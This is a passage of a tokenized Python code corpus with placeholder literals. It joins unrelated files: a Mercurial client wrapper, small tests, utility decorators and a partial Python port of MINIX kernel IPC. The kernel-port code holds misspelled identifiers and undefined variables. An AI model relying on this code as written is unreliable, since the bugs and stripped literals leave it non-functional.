[ <NUM_LIT:0> ] . split ( '<STR_LIT::>' ) [ <NUM_LIT:2> ] <EOL> else : <EOL> sys . stderr . write ( "<STR_LIT>" % spec ) <EOL> break <EOL> self . _do_pull ( ) <EOL> repeated = True <EOL> return None <EOL> else : <EOL> command = '<STR_LIT>' % self . _path <EOL> _ , output , _ = run_shell_command ( command , shell = True , us_env = True ) <EOL> if output is None or output . strip ( ) == '<STR_LIT>' or output . startswith ( "<STR_LIT>" ) : <EOL> return None <EOL> return output . strip ( ) . rstrip ( '<STR_LIT:+>' ) <EOL> def get_current_version_label ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get_branch ( ) <EOL> def get_branch ( self ) : <EOL> if self . path_exists ( ) : <EOL> command = "<STR_LIT>" % self . get_path ( ) <EOL> _ , output , _ = run_shell_command ( command , shell = True ) <EOL> if output is not None : <EOL> return output . strip ( ) <EOL> return None <EOL> def get_remote_version ( self , fetch = False ) : <EOL> if fetch : <EOL> self . _do_pull ( filter = True ) <EOL> result = self . get_log ( limit = <NUM_LIT:1> ) <EOL> if ( len ( result ) == <NUM_LIT:1> and '<STR_LIT:id>' in result [ <NUM_LIT:0> ] ) : <EOL> return result [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> return None <EOL> def get_diff ( self , basepath = None ) : <EOL> response = None <EOL> if basepath is None : <EOL> basepath = self . _path <EOL> if self . path_exists ( ) : <EOL> rel_path = normalized_rel_path ( self . _path , basepath ) <EOL> command = "<STR_LIT>" % { '<STR_LIT:path>' : sanitized ( rel_path ) } <EOL> _ , response , _ = run_shell_command ( command , shell = True , cwd = basepath ) <EOL> response = _hg_diff_path_change ( response , rel_path ) <EOL> return response <EOL> def get_affected_files ( self , revision ) : <EOL> cmd = "<STR_LIT>" % revision <EOL> code , output , _ = run_shell_command ( cmd , shell = True , cwd = self . _path ) <EOL> affected = [ ] <EOL> if code == <NUM_LIT:0> : <EOL> affected = output . split ( "<STR_LIT:U+0020>" ) <EOL> return affected <EOL> def get_log ( self , relpath = None , limit = None ) : <EOL> response = [ ] <EOL> if relpath is None : <EOL> relpath = '<STR_LIT>' <EOL> if self . path_exists ( ) and os . path . exists ( os . path . join ( self . _path , relpath ) ) : <EOL> limit_cmd = ( ( "<STR_LIT>" % ( int ( limit ) ) ) if limit else "<STR_LIT>" ) <EOL> HG_COMMIT_FIELDS = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:email>' , '<STR_LIT:date>' , '<STR_LIT:message>' ] <EOL> HG_LOG_FORMAT = '<STR_LIT>' . join ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) + '<STR_LIT>' <EOL> command = "<STR_LIT>" % ( sanitized ( relpath ) , <EOL> self . get_branch ( ) , <EOL> HG_LOG_FORMAT , <EOL> limit_cmd ) <EOL> return_code , response_str , stderr = run_shell_command ( command , shell = True , cwd = self . _path ) <EOL> if return_code == <NUM_LIT:0> : <EOL> response = response_str . strip ( '<STR_LIT>' ) . split ( "<STR_LIT>" ) <EOL> response = [ row . strip ( ) . split ( "<STR_LIT>" ) for row in response ] <EOL> response = [ dict ( zip ( HG_COMMIT_FIELDS , row ) ) for row in response ] <EOL> for entry in response : <EOL> entry [ '<STR_LIT:date>' ] = dateutil . parser . parse ( entry [ '<STR_LIT:date>' ] ) <EOL> return response <EOL> def get_status ( self , basepath = None , untracked = False ) : <EOL> response = None <EOL> if basepath is None : <EOL> basepath = self . _path <EOL> if self . path_exists ( ) : <EOL> rel_path = normalized_rel_path ( self . _path , basepath ) <EOL> command = "<STR_LIT>" % { '<STR_LIT:path>' : sanitized ( rel_path ) } <EOL> if not untracked : <EOL> command += "<STR_LIT>" <EOL> _ , response , _ = run_shell_command ( command , <EOL> shell = True , <EOL> cwd = basepath ) <EOL> if response is not None : <EOL> if response . startswith ( "<STR_LIT>" ) : <EOL> raise VcsError ( "<STR_LIT>" % ( command , basepath ) ) <EOL> if len ( response ) > <NUM_LIT:0> and response [ - <NUM_LIT:1> ] != '<STR_LIT:\n>' : <EOL> response += '<STR_LIT:\n>' <EOL> return response <EOL> def export_repository ( self , version , basepath ) : <EOL> cmd = '<STR_LIT>' . format ( version , basepath ) <EOL> result , _ , _ = run_shell_command ( cmd , shell = True , cwd = self . _path ) <EOL> if result : <EOL> return False <EOL> try : <EOL> with open ( basepath + '<STR_LIT>' , '<STR_LIT:rb>' ) as tar_file : <EOL> gzip_file = gzip . open ( basepath + '<STR_LIT>' , '<STR_LIT:wb>' ) <EOL> try : <EOL> gzip_file . writelines ( tar_file ) <EOL> finally : <EOL> gzip_file . close ( ) <EOL> finally : <EOL> os . remove ( basepath + '<STR_LIT>' ) <EOL> return True <EOL> def get_branches ( self , local_only = False ) : <EOL> if not local_only : <EOL> self . _do_pull ( ) <EOL> cmd = '<STR_LIT>' <EOL> result , out , _ = run_shell_command ( cmd , shell = True , cwd = self . _path , <EOL> show_stdout = False ) <EOL> if result : <EOL> return [ ] <EOL> branches = [ ] <EOL> for line in out . splitlines ( ) : <EOL> line = line . strip ( ) <EOL> line = line . split ( ) <EOL> branches . append ( line [ <NUM_LIT:0> ] ) <EOL> return branches <EOL> def _do_pull ( self , filter = False ) : <EOL> value , _ , _ = run_shell_command ( "<STR_LIT>" , <EOL> cwd = self . _path , <EOL> shell = True , <EOL> no_filter = not filter ) <EOL> return value == <NUM_LIT:0> <EOL> HGClient = HgClient </s>
<s> ORCID_PUBLIC_BASE_URL = '<STR_LIT>' <EOL> ORCID_SANDBOX_BASE_URL = '<STR_LIT>' </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> __metaclass__ = type <EOL> from . . import Message <EOL> class TestChannel : <EOL> def test_with ( self , conn ) : <EOL> with conn as cxn : <EOL> assert cxn . transport is not None <EOL> with cxn . channel ( <NUM_LIT:1> ) as ch : <EOL> assert <NUM_LIT:1> in cxn . channels <EOL> ch . exchange_declare ( '<STR_LIT>' , '<STR_LIT>' , auto_delete = True ) <EOL> msg = Message ( '<STR_LIT>' , <EOL> content_type = '<STR_LIT>' , <EOL> application_headers = { '<STR_LIT:foo>' : <NUM_LIT:7> , '<STR_LIT:bar>' : '<STR_LIT>' } ) <EOL> ch . basic_publish ( msg , '<STR_LIT>' ) <EOL> assert <NUM_LIT:1> not in cxn . channels <EOL> assert ch . is_open is False <EOL> assert cxn . transport is None </s>
<s> from . . import queue <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __patched__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Queue ( queue . Queue ) : <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> if maxsize == <NUM_LIT:0> : <EOL> maxsize = None <EOL> super ( Queue , self ) . __init__ ( maxsize ) <EOL> class PriorityQueue ( queue . PriorityQueue ) : <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> if maxsize == <NUM_LIT:0> : <EOL> maxsize = None <EOL> super ( PriorityQueue , self ) . __init__ ( maxsize ) <EOL> class LifoQueue ( queue . LifoQueue ) : <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> if maxsize == <NUM_LIT:0> : <EOL> maxsize = None <EOL> super ( LifoQueue , self ) . __init__ ( maxsize ) <EOL> Empty = queue . Empty <EOL> Full = queue . Full </s>
<s> import logging <EOL> from functools import wraps <EOL> import inspect <EOL> import re <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> use_newlines = False <EOL> indent = '<STR_LIT:U+0020>' <EOL> max_param_len = <NUM_LIT:20> <EOL> log_function_start = True <EOL> log_function_exit = True <EOL> RESET = '<STR_LIT>' <EOL> RED = '<STR_LIT>' <EOL> GREEN = '<STR_LIT>' <EOL> YELLOW = '<STR_LIT>' <EOL> BLUE = '<STR_LIT>' <EOL> MAGENTA = '<STR_LIT>' <EOL> CYAN = '<STR_LIT>' <EOL> WHITE = '<STR_LIT>' <EOL> BRGREEN = '<STR_LIT>' <EOL> r_of = re . compile ( '<STR_LIT>' ) <EOL> r_at = re . compile ( '<STR_LIT>' ) <EOL> def parse_repr ( obj ) : <EOL> if inspect . ismethod ( obj ) : <EOL> pat = r_of <EOL> else : <EOL> pat = r_at <EOL> s = repr ( obj ) <EOL> m = re . search ( pat , s ) <EOL> if m : <EOL> return '<STR_LIT>' . format ( m . group ( ) ) <EOL> else : <EOL> return s <EOL> def format_arg ( arg ) : <EOL> """<STR_LIT>""" <EOL> s = str ( arg ) <EOL> if type ( arg ) is type : <EOL> return s <EOL> elif isinstance ( arg , object ) and len ( s ) > max_param_len : <EOL> return parse_repr ( arg ) <EOL> else : <EOL> return s <EOL> def func_name ( f ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( f , '<STR_LIT>' ) : <EOL> qualname = RESET + f . __qualname__ + BRGREEN <EOL> else : <EOL> qualname = RESET + f . __name__ + BRGREEN <EOL> return qualname <EOL> def log_start ( f , args , kwargs ) : <EOL> argspec = inspect . getargspec ( f ) <EOL> method = False <EOL> if argspec . args and argspec . args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> method = True <EOL> qualname = func_name ( f ) <EOL> f_name = '<STR_LIT:.>' . join ( [ f . __module__ , qualname ] ) <EOL> if method : <EOL> args_list = [ '<STR_LIT>' . format ( format_arg ( args [ <NUM_LIT:0> ] ) ) ] <EOL> else : <EOL> args_list = [ ] <EOL> if method : <EOL> args_list += list ( map ( format_arg , args [ <NUM_LIT:1> : ] ) ) <EOL> else : <EOL> args_list += list ( map ( format_arg , args ) ) <EOL> args_list += list ( map ( lambda key : '<STR_LIT>' . format ( key , format_arg ( kwargs [ key ] ) ) , kwargs ) ) <EOL> if use_newlines : <EOL> f_args = '<STR_LIT>' . format ( i = indent ) . join ( args_list ) <EOL> if f_args : <EOL> log . debug ( '<STR_LIT>' <EOL> . format ( i = indent , f_name = f_name , f_args = f_args ) ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' . format ( i = indent , f_name = f_name ) ) <EOL> else : <EOL> f_args = '<STR_LIT:U+002CU+0020>' . join ( args_list ) <EOL> log . debug ( '<STR_LIT>' . format ( f_name = f_name , f_args = f_args ) ) <EOL> def log_exit ( f ) : <EOL> f_name = '<STR_LIT:.>' . join ( [ f . __module__ , func_name ( f ) ] ) <EOL> log . debug ( '<STR_LIT>' . format ( f_name ) ) <EOL> def logged ( f ) : <EOL> """<STR_LIT>""" <EOL> @ wraps ( f ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> if log_function_start : <EOL> log_start ( f , args , kwargs ) <EOL> ret = f ( * args , ** kwargs ) <EOL> if log_function_exit : <EOL> log_exit ( f ) <EOL> return ret <EOL> return wrapper </s>
<s> from numpy import array , sqrt , zeros <EOL> from numpy . random import randn <EOL> from numpy . testing import assert_allclose <EOL> from commpy . channelcoding . ldpc import get_ldpc_code_params , ldpc_bp_decode <EOL> from commpy . utilities import hamming_dist <EOL> import os <EOL> from nose . plugins . attrib import attr <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestLDPCCode ( object ) : <EOL> @ classmethod <EOL> def setup_class ( cls ) : <EOL> dir = os . path . dirname ( __file__ ) <EOL> ldpc_design_file_1 = os . path . join ( dir , '<STR_LIT>' ) <EOL> cls . ldpc_code_params = get_ldpc_code_params ( ldpc_design_file_1 ) <EOL> @ classmethod <EOL> def teardown_class ( cls ) : <EOL> pass <EOL> def test_ldpc_bp_decode ( self ) : <EOL> N = <NUM_LIT> <EOL> k = <NUM_LIT> <EOL> rate = <NUM_LIT:0.5> <EOL> Es = <NUM_LIT:1.0> <EOL> snr_list = array ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> niters = <NUM_LIT> <EOL> tx_codeword = zeros ( N , int ) <EOL> ldpcbp_iters = <NUM_LIT:100> <EOL> fer_array_ref = array ( [ <NUM_LIT> / <NUM_LIT:1000> , <NUM_LIT> / <NUM_LIT> ] ) <EOL> fer_array_test = zeros ( len ( snr_list ) ) <EOL> for idx , ebno in enumerate ( snr_list ) : <EOL> noise_std = <NUM_LIT:1> / sqrt ( ( <NUM_LIT:10> ** ( ebno / <NUM_LIT> ) ) * rate * <NUM_LIT:2> / Es ) <EOL> fer_cnt_bp = <NUM_LIT:0> <EOL> for iter_cnt in xrange ( niters ) : <EOL> awgn_array = noise_std * randn ( N ) <EOL> rx_word = <NUM_LIT:1> - ( <NUM_LIT:2> * tx_codeword ) + awgn_array <EOL> rx_llrs = <NUM_LIT> * rx_word / ( noise_std ** <NUM_LIT:2> ) <EOL> [ dec_word , out_llrs ] = ldpc_bp_decode ( rx_llrs , self . ldpc_code_params , <EOL> ldpcbp_iters ) <EOL> num_bit_errors = hamming_dist ( tx_codeword , dec_word ) <EOL> if num_bit_errors > <NUM_LIT:0> : <EOL> fer_cnt_bp += <NUM_LIT:1> <EOL> if fer_cnt_bp >= <NUM_LIT:200> : <EOL> fer_array_test [ idx ] = float ( fer_cnt_bp ) / ( iter_cnt + <NUM_LIT:1> ) <EOL> break <EOL> assert_allclose ( fer_array_test , fer_array_ref , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) </s>
<s> import inspect <EOL> from . import fields <EOL> from . utils import fn_name_to_pretty_label <EOL> class BaseActions ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_all_actions ( cls ) : <EOL> methods = inspect . getmembers ( cls ) <EOL> return [ { '<STR_LIT:name>' : m [ <NUM_LIT:0> ] , <EOL> '<STR_LIT:label>' : m [ <NUM_LIT:1> ] . label , <EOL> '<STR_LIT>' : m [ <NUM_LIT:1> ] . params <EOL> } for m in methods if getattr ( m [ <NUM_LIT:1> ] , '<STR_LIT>' , False ) ] <EOL> def _validate_action_parameters ( func , params ) : <EOL> """<STR_LIT>""" <EOL> if params is not None : <EOL> valid_fields = [ getattr ( fields , f ) for f in dir ( fields ) if f . startswith ( "<STR_LIT>" ) ] <EOL> for param in params : <EOL> param_name , field_type = param [ '<STR_LIT:name>' ] , param [ '<STR_LIT>' ] <EOL> if param_name not in func . __code__ . co_varnames : <EOL> raise AssertionError ( "<STR_LIT>" "<STR_LIT>" . format ( <EOL> param_name , func . __name__ ) ) <EOL> if field_type not in valid_fields : <EOL> raise AssertionError ( "<STR_LIT>" "<STR_LIT>" . format ( <EOL> field_type , func . __name__ , param_name ) ) <EOL> def rule_action ( label = None , params = None ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> params_ = params <EOL> if isinstance ( params , dict ) : <EOL> params_ = [ dict ( label = fn_name_to_pretty_label ( name ) , <EOL> name = name , <EOL> fieldType = field_type ) for name , field_type in params . items ( ) ] <EOL> _validate_action_parameters ( func , params_ ) <EOL> func . is_rule_action = True <EOL> func . label = label or fn_name_to_pretty_label ( func . __name__ ) <EOL> func . params = params_ <EOL> return func <EOL> return wrapper </s>
<s> import os <EOL> import sys <EOL> os . environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> from funfactory import manage <EOL> except ImportError : <EOL> tmp_path = os . path . join ( os . path . dirname ( os . path . abspath ( __file__ ) ) , <EOL> '<STR_LIT>' , '<STR_LIT:src>' , '<STR_LIT>' ) <EOL> sys . path . append ( tmp_path ) <EOL> from funfactory import manage <EOL> sys . path . remove ( tmp_path ) <EOL> manage . setup_environ ( __file__ , more_pythonic = True ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> manage . main ( ) </s>
<s> from v1pysdk import V1Meta <EOL> v1 = V1Meta ( ) <EOL> new_story = v1 . Story . create ( <EOL> Name = "<STR_LIT>" , <EOL> Scope = v1 . Scope ( <NUM_LIT> ) , <EOL> ) <EOL> new_story . Owners = list ( v1 . Member . where ( Name = "<STR_LIT>" ) ) <EOL> v1 . commit ( ) </s>
<s> def _set_idle_name ( name , n ) : <EOL> p_z = False <EOL> if n > <NUM_LIT> : <EOL> n = <NUM_LIT> <EOL> name = '<STR_LIT>' <EOL> i = <NUM_LIT:4> <EOL> c = <NUM_LIT:100> <EOL> while c > <NUM_LIT:0> : <EOL> digit = n // c <EOL> n -= digit * c <EOL> if p_z or digit != <NUM_LIT:0> or c == <NUM_LIT:1> : <EOL> p_z = True <EOL> name = '<STR_LIT>' . join ( [ name , chr ( ord ( '<STR_LIT:0>' ) + digit ) ] ) <EOL> i += <NUM_LIT:1> <EOL> c = c // <NUM_LIT:10> <EOL> return name <EOL> PICK_ANY = <NUM_LIT:1> <EOL> PICK_HIGHERONLY = <NUM_LIT:2> <EOL> def BuildNotifyMessage ( m_ptr , src , dst_ptr ) : <EOL> m_ptr [ '<STR_LIT>' ] = NOTIFY_MESSAGE <EOL> m_ptr [ '<STR_LIT>' ] = get_monotonic ( ) <EOL> if src == HARDWARE : <EOL> m_ptr [ '<STR_LIT>' ] = dst_ptr [ '<STR_LIT>' ] <EOL> dst_ptr [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> elif src == SYSTEM : <EOL> m_ptr [ '<STR_LIT>' ] = dst_ptr [ '<STR_LIT>' ] <EOL> dst_ptr [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> def proc_init ( ) : <EOL> rp = BEG_PROC_ADDR + <NUM_LIT:1> <EOL> i = - NR_TASKS + <NUM_LIT:1> <EOL> while rp < END_PROC_ADDR : <EOL> rp [ '<STR_LIT>' ] = RTS_SLOT_FREE <EOL> rp [ '<STR_LIT>' ] = PMAGIC <EOL> rp [ '<STR_LIT>' ] = i <EOL> rp [ '<STR_LIT>' ] = _ENDPOINT ( <NUM_LIT:0> , rp [ '<STR_LIT>' ] ) <EOL> rp [ '<STR_LIT>' ] = None <EOL> rp [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> rp [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> arch_proc_reset ( rp ) <EOL> rp += <NUM_LIT:1> <EOL> i += <NUM_LIT:1> <EOL> sp = BEG_PRIV_ADDR + <NUM_LIT:1> <EOL> i = <NUM_LIT:1> <EOL> while sp < END_PRIV_ADDR : <EOL> sp [ '<STR_LIT>' ] = NONE <EOL> sp [ '<STR_LIT>' ] = sys_id_t ( i ) <EOL> ppriv_addr [ i ] = sp <EOL> sp [ '<STR_LIT>' ] = NONE <EOL> sp [ '<STR_LIT>' ] = NONE <EOL> sp += <NUM_LIT:1> <EOL> i += <NUM_LIT:1> <EOL> idle_priv . s_flags = IDL_F <EOL> for i in range ( CONFIG_MAX_CPUS ) : <EOL> ip = get_cpu_var_ptr ( i , idle_proc ) <EOL> ip [ '<STR_LIT>' ] = IDLE <EOL> ip [ '<STR_LIT>' ] = idle_priv <EOL> ip [ '<STR_LIT>' ] |= RTS_PROC_STOP <EOL> _set_idle_name ( ip [ '<STR_LIT>' ] , i ) <EOL> def _switch_address_space_idle ( ) : <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> def _idle ( ) : <EOL> '''<STR_LIT>''' <EOL> if priv ( p ) [ '<STR_LIT>' ] & BILLABLE : <EOL> CPULOCAL_STRUCT [ <NUM_LIT:0> ] [ bill_ptr ] = p <EOL> _switch_address_space_idle ( ) <EOL> restart_local_timer ( ) <EOL> '''<STR_LIT>''' <EOL> context_stop ( proc_addr ( KERNEL ) ) <EOL> if not SPROFILE : <EOL> halt_cpu ( ) <EOL> else : <EOL> if not sprofiling : <EOL> halt_cpu ( ) <EOL> else : <EOL> v = get_cpulocal_var_ptr ( idle_interrupted ) <EOL> interrupts_enable ( ) <EOL> while not v : <EOL> arch_pause ( ) <EOL> interrupts_disable ( ) <EOL> v = <NUM_LIT:0> <EOL> '''<STR_LIT>''' <EOL> def switch_to_user ( ) : <EOL> pass <EOL> def _do_sync_ipc ( caller_ptr , call_nr , src_dst_e , m_ptr ) : <EOL> '''<STR_LIT>''' <EOL> if ( <EOL> call_nr < <NUM_LIT:0> or <EOL> call_nr > IPCNO_HIGHEST or <EOL> call_nr >= <NUM_LIT:32> or <EOL> callname != ipc_call_names [ call_nr ] <EOL> ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( call_nr , proc_nr ( caller_ptr ) , src_dst_e ) ) <EOL> return ETRAPDENIED <EOL> if src_dst_e == ANY : <EOL> if call_nr != RECEIVE : <EOL> return EINVAL <EOL> src_dst_p = int ( src_dst_e ) <EOL> else : <EOL> if not isokendpt ( src_dst_e , src_dst_p ) : <EOL> return EDEADSRCDST <EOL> '''<STR_LIT>''' <EOL> if call_nr != RECEIVE : <EOL> if not may_send_to ( caller_ptr , src_dst_p ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( callname , caller_ptr [ '<STR_LIT>' ] , <EOL> src_dst_e ) ) <EOL> return ECALLDENIED <EOL> '''<STR_LIT>''' <EOL> if not priv ( caller_ptr ) [ '<STR_LIT>' ] & ( <NUM_LIT:1> << call_nr ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( callname , caller_ptr [ '<STR_LIT>' ] , src_dst_e ) ) <EOL> return ETRAPDENIED <EOL> if call_nr != SENDREC and call_nr != RECEIVE and iskerneln ( src_dst_p ) : <EOL> if DEBUG_ENABLE_IPC_WARNINGS : <EOL> print ( '<STR_LIT>' <EOL> . format ( callname , caller_ptr [ '<STR_LIT>' ] , src_dst_e ) ) <EOL> return ETRAPDENIED <EOL> if call_nr == SENDREC : <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_REPLY_PEND <EOL> elif call_nr == SEND : <EOL> result = mini_send ( caller_ptr , src_dst_e , m_ptr , <NUM_LIT:0> ) <EOL> if call_nr == SEND or result != OK : <EOL> pass <EOL> elif call_nr == RECEIVE : <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MF_REPLY_PEND <EOL> IPC_STATUS_CLEAR ( caller_ptr ) <EOL> result = mini_receive ( caller_ptr , src_dst_e , m_ptr , <NUM_LIT:0> ) <EOL> elif call_nr == NOTIFY : <EOL> result = mini_notify ( caller_ptr , src_dst_e ) <EOL> elif call_nr == SENDNB : <EOL> result = mini_send ( caller_ptr , src_dst_e , m_ptr , NON_BLOCKING ) <EOL> else : <EOL> result = EBADCALL <EOL> return result <EOL> def do_ipc ( r1 , r2 , r3 ) : <EOL> caller_ptr = get_cpulocal_var ( proc_ptr ) <EOL> call_nr = r1 <EOL> assert ( not RTS_ISSET ( caller_ptr , RTS_SLOT_FREE ) ) <EOL> kbill_ipc = caller_ptr <EOL> if caller_ptr [ '<STR_LIT>' ] & ( MF_SC_TRACE | MR_SC_DEFER ) : <EOL> if ( <EOL> ( caller_ptr [ '<STR_LIT>' ] & ( MF_SC_TRACE | MR_SC_DEFER ) ) == <EOL> MF_SC_TRACE <EOL> ) : <EOL> '''<STR_LIT>''' <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MF_SC_TRACE <EOL> assert ( not caller_ptr [ '<STR_LIT>' ] & MR_SC_DEFER ) <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_SC_DEFER <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = r1 <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = r2 <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = r3 <EOL> cause_sig ( proc_nr ( caller_ptr ) , SIGTRAP ) <EOL> return caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MF_SC_DEFER <EOL> assert ( not caller_ptr [ '<STR_LIT>' ] & MF_SC_ACTIVE ) <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_SC_ACTIVE <EOL> if caller [ '<STR_LIT>' ] & MF_DELIVERMSG : <EOL> panic ( '<STR_LIT>' <EOL> . format ( caller_ptr [ '<STR_LIT>' ] , caller_ptr [ '<STR_LIT>' ] ) ) <EOL> '''<STR_LIT>''' <EOL> if call_nr in [ SENDREC , SEND , RECEIVE , NOTIFY , SENDNB ] : <EOL> return _do_sync_ipc ( caller_ptr , call_nr , r2 , r3 ) <EOL> elif call_nr == SENDA : <EOL> msg_size = len ( r2 ) <EOL> caller_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if msg_size > <NUM_LIT:16> * ( NR_TASKS + NR_PROCS ) : <EOL> return EDOM <EOL> return mini_senda ( caller_ptr , r3 , msg_size ) <EOL> elif call_nr == PYTHONIX_KERNINFO : <EOL> if not pythonix_kerninfo_user : <EOL> return EBADCALL <EOL> arch_set_secondary_ipc_return ( caller_ptr , pythonix_kerninfo_user ) <EOL> return OK <EOL> else : <EOL> return EBADCALL <EOL> def _deadlock ( function , cp , src_dst_e ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> def _has_pending ( map_ , src_p , asynm ) : <EOL> id_ = NULL_PRIV_ID <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> if src_p != ANY : <EOL> src_id = nr_to_id ( src_p ) <EOL> if get_sys_bit ( map_ , src_id ) : <EOL> pass <EOL> '''<STR_LIT>''' <EOL> else : <EOL> aux = True <EOL> for src_id in range ( <NUM_LIT:0> , NR_SYS_PROCS , BITCHUNCK_BITS ) : <EOL> if get_sys_bits ( _map , src_id ) != <NUM_LIT:0> : <EOL> '''<STR_LIT>''' <EOL> if aux : <EOL> while not get_sys_bit ( map_ , src_id ) : <EOL> src_id += <NUM_LIT:1> <EOL> aux = False <EOL> break <EOL> if src_id < NR_SYS_PROCS : <EOL> id_ = src_id <EOL> return id_ <EOL> def has_pending_notify ( caller , src_p ) : <EOL> _map = priv ( caller ) [ '<STR_LIT>' ] <EOL> return _has_pending ( _map , src_p , <NUM_LIT:0> ) <EOL> def has_pending_asend ( caller , src_p ) : <EOL> _map = priv ( caller ) [ '<STR_LIT>' ] <EOL> return _has_pending ( _map , src_p , <NUM_LIT:1> ) <EOL> def unset_notify_pending ( caller , src_p ) : <EOL> _map = priv ( caller ) [ '<STR_LIT>' ] <EOL> unset_sys_bit ( _map , src_p ) <EOL> def mini_send ( caller_ptr , dst_e , m_ptr , flags ) : <EOL> dst_p = ENDPOINT ( dst_e ) <EOL> dst_ptr = proc_addr ( dst_p ) <EOL> if RTS_ISSET ( dst_ptr , RTS_NO_ENDPOINT ) : <EOL> return EDEADSRCDST <EOL> '''<STR_LIT>''' <EOL> if WILLRECEIVE ( dst_ptr , caller_ptr [ '<STR_LIT>' ] ) : <EOL> assert ( not ( dst_ptr [ '<STR_LIT>' ] & MF_DELIVERMSG ) ) <EOL> if not ( flags & FROM_KERNEL ) : <EOL> if copy_msg_from_user ( m_ptr , dst_ptr [ '<STR_LIT>' ] ) : <EOL> return EFAULT <EOL> else : <EOL> dst_ptr [ '<STR_LIT>' ] = m_ptr <EOL> IPC_STATUS_ADD_FLAGS ( dst_ptr , IPC_FLG_MSG_FROM_KERNEL ) <EOL> dst_ptr [ '<STR_LIT>' ] [ '<STR_LIT>' ] = caller_ptr [ '<STR_LIT>' ] <EOL> dst_ptr [ '<STR_LIT>' ] |= MF_DELIVERMSG <EOL> if caller_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND : <EOL> call = SENDREC <EOL> else : <EOL> if flags & NON_BLOCKING : <EOL> call = SENDNB <EOL> else : <EOL> call = SEND <EOL> IPC_STATUS_ADD_CALL ( dst_ptr , call ) <EOL> if dst_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND : <EOL> dst_ptr [ '<STR_LIT>' ] &= ~ MF_REPLY_PEND <EOL> RTS_UNSET ( dst_ptr , RTS_RECEIVING ) <EOL> if DEBUG_IPC_HOOK : <EOL> hook_ipc_msgsend ( dst_ptr [ '<STR_LIT>' ] , caller_ptr , dst_ptr ) <EOL> hook_ipc_msgrecv ( dst_ptr [ '<STR_LIT>' ] , caller_ptr , dst_ptr ) <EOL> else : <EOL> if flags & NON_BLOCKING : <EOL> return ENOTREADY <EOL> if deadlock ( send , caler_ptr , dst_e ) : <EOL> return ELOCKED <EOL> if not ( flags & FROM_KERNEL ) : <EOL> if copy_msg_from_user ( m_ptr , caller_ptr [ '<STR_LIT>' ] ) : <EOL> return EFAULT <EOL> else : <EOL> caller_ptr [ '<STR_LIT>' ] = m_ptr <EOL> '''<STR_LIT>''' <EOL> caller_ptr [ '<STR_LIT>' ] |= MF_SENDING_FROM_KERNEL <EOL> RTS_SET ( caller_ptr , RTS_SENDING ) <EOL> caller_ptr [ '<STR_LIT>' ] = dst_e <EOL> assert ( caller_ptr [ '<STR_LIT>' ] == None ) <EOL> '''<STR_LIT>''' <EOL> if DEBUG_IPC_HOOK : <EOL> hook_ipc_msgsend ( caller_ptr [ '<STR_LIT>' ] , caller_ptr , dst_ptr ) <EOL> return OK <EOL> def _mini_receive ( caller_ptr , src_e , m_buff_usr , flags ) : <EOL> def receive_done ( caller_ptr ) : <EOL> if caller_ptr [ '<STR_LIT>' ] & MF_REPLY_PEND : <EOL> caller_ptr [ '<STR_LIT>' ] &= ~ MR_REPLY_PEND <EOL> return OK <EOL> '''<STR_LIT>''' <EOL> assert ( not ( caller_ptr [ '<STR_LIT>' ] & MF_ELIVERMSG ) ) <EOL> caller_ptr [ '<STR_LIT>' ] = m_buff_usr <EOL> if src_e == ANY : <EOL> src_p = ANY <EOL> else : <EOL> okendpt ( src_e , src_p ) <EOL> if RTS_ISSET ( proc_addr ( src_p ) , RTS_NO_ENDPOINT ) : <EOL> return EDEADSRCDST <EOL> '''<STR_LIT>''' <EOL> if not RTS_ISSET ( caller_ptr , 